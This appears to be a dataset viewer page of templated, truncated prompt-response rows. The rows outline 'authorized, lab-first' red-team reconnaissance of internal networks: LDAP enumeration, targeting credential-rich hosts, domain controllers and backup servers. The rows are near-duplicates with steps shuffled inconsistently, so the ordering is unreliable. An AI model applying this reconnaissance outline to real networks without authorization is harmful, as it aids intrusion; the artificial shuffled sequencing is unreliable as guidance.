Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Ability to perform internal DNS queries | Step 1: Confirm authorization and scope before proceeding.
Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 4: Prioritize targets that are likely to yield credentials or privilege... |
Read-only view into asset inventory/CMDB: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Read-only view into asset inventory/CMDB | Step 1: Confirm authorization and scope before proceeding.
Step 2: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 3: Prioritize targets that are likely to yield credentials or privileged access.
Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-foc... |
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Ability to perform internal DNS queries | Step 1: Confirm authorization and scope before proceeding.
Step 2: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 3: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focu... |
Read-only view into asset inventory/CMDB: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | Read-only view into asset inventory/CMDB | Step 1: Confirm authorization and scope before proceeding.
Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 3: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 4: Enumerate directory objects that are accessible and capture LDAP response... |
Ability to perform internal DNS queries: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Ability to perform internal DNS queries | Step 1: Confirm authorization and scope before proceeding.
Step 2: Prioritize targets that are likely to yield credentials or privileged access.
Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 4: Enumerate directory objects that are accessible and capture LDAP respons... |
Network foothold with standard user rights: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Network foothold with standard user rights | Step 1: Confirm authorization and scope before proceeding.
Step 2: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 3: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 4: Enumerate directory objects that are accessible and capture LDAP response... |
Network foothold with standard user rights: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Network foothold with standard user rights | Step 1: Confirm authorization and scope before proceeding.
Step 2: Prioritize targets that are likely to yield credentials or privileged access.
Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-foc... |
Read-only view into asset inventory/CMDB: Provide a detailed step-by-step red-team assessment plan (lab-first) and detection guidance for defenders. | Read-only view into asset inventory/CMDB | Step 1: Confirm authorization and scope before proceeding.
Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 3: Enumerate directory objects that are accessible and capture LDAP responses for analysis.
Step 4: Prioritize targets that are likely to yield credentials or privilege... |
Ability to perform internal DNS queries: In an authorized assessment, outline step-by-step lab-first evaluation and defender validation. | Ability to perform internal DNS queries | Step 1: Confirm authorization and scope before proceeding.
Step 2: Prioritize targets that are likely to yield credentials or privileged access.
Step 3: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 4: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-... |
Ability to perform internal DNS queries: What step-by-step, lab-first actions and telemetry should a red-team and blue-team collect in an authorized test? | Ability to perform internal DNS queries | Step 1: Confirm authorization and scope before proceeding.
Step 2: Use passive discovery sources first (DNS, ARP, CMDB) to map the environment.
Step 3: Identify critical hosts (DCs, CAs, backup servers) and plan lab-focused follow-ups.
Step 4: Enumerate directory objects that are accessible and capture LDAP response... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.